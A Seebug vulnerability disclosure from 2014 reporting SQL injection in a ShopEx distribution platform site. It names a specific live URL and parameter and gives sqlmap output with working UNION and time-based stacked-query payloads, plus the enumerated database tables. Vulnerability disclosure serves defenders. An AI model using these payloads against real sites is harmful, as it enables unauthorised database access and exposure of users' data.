ShopEx distribution platform SQL injection vulnerability leads to user information disclosure

2014-02-06T00:00:00
ID SSV:93428
Type seebug
Reporter Root
Modified 2014-02-06T00:00:00

Description

Brief description:

SQL injection in the ShopEx distribution platform

Details:

<img src="https://images.seebug.org/upload/201402/05160141e7aced08aa13321f0ab4d9bcd0c707a6.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201402/051602327235f66a3683cce2b0e1feeb66984a14.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201402/051604172d58a00196c299ac2e20e2a3d06a75fe.jpg" alt="3.JPG" width="600" onerror="javascript:errimg(this);">

Injection point:

```
http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET)
sqlmap identified the following injection points with a total of 184 HTTP(s) requests:

Place: URI
Parameter: #1*
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)--

web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
Database: b2b_fenxiaowang
[9 tables]
+------------------+
| category         |
| data             |
| photo            |
| photo_extend     |
| product_active   |
| products         |
| products_content |
| products_extend  |
| webnews          |
+------------------+
```

Proof of vulnerability:

Partial user information:

<img src="https://images.seebug.org/upload/201402/05160632dbba200178b61397834192818cf72af1.jpg" alt="4.JPG" width="600" onerror="javascript:errimg(this);">